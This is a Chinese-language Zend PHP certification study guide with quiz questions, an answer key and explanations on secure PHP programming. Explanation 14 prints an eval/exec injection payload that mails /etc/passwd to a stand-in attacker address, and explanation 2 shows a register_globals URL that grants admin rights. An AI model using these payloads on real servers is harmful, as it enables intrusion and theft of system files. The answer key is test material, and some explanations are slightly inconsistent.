Zend权威认证试题讲解11 - 编写安全的PHP程序

PHP太强大、太容易了，因此开发者常常忘记Web安全相关的问题。
抛开重要性不看，安全问题往往是网站中最容易被人忽视的一个部分。不幸的是，有很多种方法可以从内部或外部危害系统的安全，你必须不断的找出并修补这些潜在的危险因素。
在进行安全检测时，有很多需要强调的问题——不止是与安全直接相关的，还包括许多其他的内容。
要编写安全的程序，首先必须掌握一些基础技术，这样你才能应付本章的题目。

问题

1．以下哪种方法能防止你的PHP程序遭受外部入侵？

A．使用复杂的加密算法
B．保护数据库密码
C．如果有可能的话，使用SSL
D．验证输入
E．只使用来源可信的输入

2．假设$action和$data变量用来接受用户输入，并且register_globals是打开的。以下代码是否安全？

[php]<?php
if(isUserAdmin()) { $isAdmin = true; }
$data = validate_and_return_input($data);
switch($action)
{
        case 'add':
                addSomething($data);
                break;
        case 'delete':
                if($isAdmin) {
                        deleteSomething($data);
                }
                break;
        case 'edit':
                if($isAdmin) {
                        editSomething($data);
                }
                break;
        default:
                print "Bad Action.";
}
?>[/php]

A．安全。在执行受保护的操作前先检查$isAdmin是否为true
B．不安全。没有确认$action是不是合法输入
C．不安全。$isAdmin可以通过register_globals被篡改
D．安全。因为它验证了用户数据$data
E．A和B

3．要防止跨站攻击，以下哪些是需要做的？（三选）

A．永远不要使用include和require引入靠用户输入决定路径的文件（比如：include”$username/script.txt”;）
B．除非网站需要，否则关闭allow_url_fopen
C．避免使用如curl这类用来打开远程连接的扩展库
D．使用类似strip_tags()一类的函数过滤一个用户输入给另一个用户看的内容
E．以上都对

4．如果register_globals必须要被打开，如何才能防止恶意用户危害系统安全？（双选）

A．过滤所有来自非信任源的数据
B．过滤所有外部数据
C．所有变量在使用前先初始化
D．使用难猜变量名来防止用户篡改数据
E．以上都对

5．SQL查询常常基于用户输入的数据来构建。以下哪种方法能避免安全隐患？

A．在数据服务器和web服务器之间放置防火墙
B．转义用户数据，使其中无法包含DBMS能执行的SQL命令
C．使用存储例程
D．使用面向对象编程，把每个查询定义为单独的类

6．某些时候需要在PHP脚本中使用第三方功能，来实现一些PHP不能完成的任务（比如调用压缩软件压缩某种PHP不支持其格式的文件）。在PHP脚本中执行系统命令时，以下哪些选项能确保没有命令注入？（双选）

A．总是给要在exec()中执行的命令加`
B．总是使用shell_exec函数，它能够在执行前对命令进行安全检查
C．使用escapeshellcmd函数转义命令中的特殊字符
D．在执行命令前，先用ini_set()打开safe_mode，
E．用escapeshellarg函数在执行前转义命令参数

7．处理HTTP文件上传时，PHP把文件储存在$_FILES中。在PHP脚本的执行周期中，这些文件将放在本地的临时文件夹里，而在脚本结束后，文件将被自动删除。在处理HTTP文件上传时，如果确保当前操作的文件是正确的文件？（双选）

A．操作前，将文件名与浏览器报告的文件名对比
B．操作前，用file_exists函数确保文件存在
C．用is_uploaded_file函数确认你的文件的确是通过HTTP方式传输过来的
D．用move_upload_file()将文件移动到安全位置
E．只信任PHP存储临时文件的目录下的文件

8．在PHP的“安全模式”下，以下哪些设置有助于降低安全风险？（三选）

A．限制shell命令的执行
B．限制对系统环境变量的访问
C．限制PHP的文件包含目录
D．限制允许对数据库进行的操作
E．以上全部

9．要限制脚本只能访问一个指定的文件夹中的文件，以下那种方法最简单？

A．打开safe_mode
B．用open_basedir指定允许的文件夹
C．用自定义函数指定PHP可以访问的目录
D．设置文件系统权限，让PHP只能访问允许的目录
E．以上都不对，无法限制PHP的访问目录

10．上传文件时，能否确保客户端浏览器不会上传大于指定容量的文件？

A．能
B．不能

11．你的PHP以CGI的形式运行在Linux+Apache系统的cgi-bin文件夹中。如果有人打开以下URL将发生什么？

/cgi-bin/php?/etc/passwd

A．/etc/passwd目录下的文件都会被显示出来，造成安全隐患
B．操作系统会检查Apache是否允许打开/etc/passwd目录
C．/etc/passwd字符串作为参数传给了脚本
D．什么都不会发生。CGI模式下的PHP将自动拒绝此次访问
E．PHP尝试把/etc/passwd作为PHP脚本进行解释

12．尽管并不彻底，但以下哪些方法能识别并防范代码中的安全隐患？（选择最合适的答案）
A．查阅PHP手册中提到的安全隐患
B．任何脚本执行失败的情况都写入日志
C．保持更新最新的PHP版本，尤其是解决了安全问题的那些
D．使用第三方PHP包时，了解并修正其中的安全问题
E．以上都对

13．当网站发生错误时，该如何处理？

A．应该向用户显示错误信息以及导致该错误的相关技术信息，并且网站管理员要记录这个错误
B．需要记录该错误，并向用户致歉
C．应该向用户显示错误信息以及导致该错误的相关技术信息，以便用户把错误信息汇报给网站管理员
D．把用户引导回主页，让用户不知道发生了错误
E．以上都不对

14．        在什么情况下，以下脚本才是安全的？

[php]<?php
$newfunc = create_function('$a', 'return $a * {$_POST['number']};”);
$newfunc(10);
?>[/php]

A．任何时候都安全。最坏的情况只不过是匿名函数newfunc()返回了一个数字
B．当register_globals打开时
C．什么时候都不安全。匿名函数newfunc()允许用户更改数学式的运行，将造成安全隐患
D．什么时候都不安全。匿名函数newfunc()允许用户在服务器上执行任意代码，将造成安全隐患
E．只在allow_url_fopen打开时安全

15．以下哪种PHP安装方式有很高的安全隐患，并且运行效率也最低？

A．Apache共享模块
B．Apache的编译模块
C．CGI
D．IIS下的ISAPI模块

答案速查
1：D
2：C
3：ABC
4：BC
5：B
6：CE
7：CD
8：ABC
9：B
10：B
11：D
12：E
13：B
14：D
15：C

答案详解

1．正确答案是D。虽然其他选项在一定程度上也是正确的，但破解安全问题的最简单的方法还是验证外部数据。无论是来自用户提交的表单还是本地服务器环境，任何第三方数据都应该进行验证，以确保其符合程序需要。

2．答案是C。这段代码绝对不安全！事实上，当register_globals打开时，这个安全问题十分常见。问题出在$isAdmin变量上：尽管它是一个布尔值，只有当用户是管理员时才会被赋值，而其他情况下不会赋值。但由于register_globals是打开的，恶意用户只要通过URL传递一个GET变量就可以获得管理员权限：
http://www.example.com/action.ph ... a=foo&isAdmin=1

3．正确答案是A，B和C。A和B说的都是相似的PHP安全问题，恶意用户可以通过篡改URL来修改$username变量。如果用户这么做了，并且allow_url_fopen是打开的，PHP将下载某台非信任的远程服务器上的script.txt文件，并当作本地PHP脚本执行。另一个常见但不那么严重的隐患是，把一个用户的输入传递给另一个用户。比如在论坛或电子邮件中，不过滤HTML标签。这将允许恶意用户使用JavaScript脚本攻击查看这段内容的用户，造成跨站攻击或者浏览器bug——可怜的用户因为你的过错而受害。

4．正确答案是B和C。过滤非信任来源的数据听起来是个好主意，但实际上任何外部数据都有可能造成安全问题，并危及你的脚本。当register_globals打开时，显然要保证所有变量在使用前都进行过初始化，以防止恶意用户进行注入。

5．处理数据库查询中的用户数据时，你应该转义SQL中所有应该转义的数据。这是一个普遍的数据库问题——所有基于SQL的数据库都容易收到SQL注入攻击，需要用PHP提供的转义函数来防范。

6．答案是C和E。在PHP里执行有变量参与的系统命令时，没有任何一个函数是“绝对安全”的。你应该用escapeshellcmd和escapeshellarg函数转义传递给shell的命令和参量。

7．正确答案是C和D。即使脚本执行完后不需要保存该文件，你也应该在访问此文件之前，先用is_uploaded_file函数确保文件名正确。同样，如果需要把文件从临时文件夹移出以长期保存该文件时，你应该使用move_upload_file函数，它会在移动前对该文件进行检查。

8．正确答案是A，B和C。安全模式提供了许多附加的安全验证，有助于降低安全隐患——尤其是在多个用户访问同一个PHP的共享主机上。尽管安全模式能限制一些东西，但在执行系统命令、访问环境变量和判断文件是否能被引入（比如对每个文件进行额外的UID/GID检查）时，它无法进行安全检查。

9．正确答案是B。open_basedir设置能让你指定允许PHP读取的目录。这项设置是独立于safe_mode之外的，并且可以指定多个目录。注意，选项D也是一种可行的限制访问的方式，但它不够简单——还很难维护。

10．正确答案是B。尽管可以通过在HTML中添加一个MAX_FILE_SIZE隐藏域的方式来指定上传文件的容量限制，但难保客户端就一定会遵守此约定（译者注：事实上，没有任何一个浏览器遵守了此约定）。

11．以CGI模式运行时，PHP将自动采取一些措施来减少常见的安全隐患。措施之一就应用在把任意某个文件作为命令行参量传递给解释器执行的时候。如果不是这样，PHP将尝试读取/etc/passwd——一个“全球可读（world-readable）”的文件，同时解释器把它视作PHP脚本来执行，最终导致所有的用户帐号被输出到客户端上。不过，由于PHP内建的安全机制，实际上什么都不会发生。答案是D。

12．正确答案是E。所有选项都能被开发者用来降低网站的危险系数。要想有效得保证网站安全，你首先应该找出潜在的危险。意味着你必须关注安全公告，记录可疑操作（可能是恶意用户企图攻击你的系统）。

13．正确答案是B。网站不应该向用户展示任何无意义的信息（比如一个失败的SQL查询）。尽管这些信息对大部分用户来说毫无意义，但对开发者（包括黑客）来说这些却是非常有价值的资源。他们可以由此找到一条有效的策略来攻击你的系统。比如说，一个恶意用户由此知道了你的SQL查询的结构，那他就非常容易通过表单进行注入，造成安全隐患。当错误发生时，应该只给用户发送一条致歉信息，而错误细节应该被记录在日志中，以便网站管理员查阅。

14．正确答案是D。尽管很隐蔽，但该脚本确实能让用户在服务器上执行任何代码。作为数学式的一部分，考虑一下当$_POST[‘number’]是如下字符串时的情况：
        (eval(“exec('cat /etc/passwd | mail baduser@somewhere.com');”)) ? 0 : 1
        匿名函数将变成：
        return $a * (eval(“exec('cat /etc/passwd | mail baduser@somewhere.com');”)) ? 0 : 1;
        这将使得用户可以通过eval()语句执行任何代码，而且返回的仍然是一个“合法”值。create_function()或eval()能执行动态代码，所以必须仔细检查动态部分，避免注入。

15．任何安装不恰当的PHP版本都会有安全问题，但在选项中，CGI最严重。默认状态下它有许多安全隐患，并且执行效率低下，在上线前需要进行严格的检查。答案是C。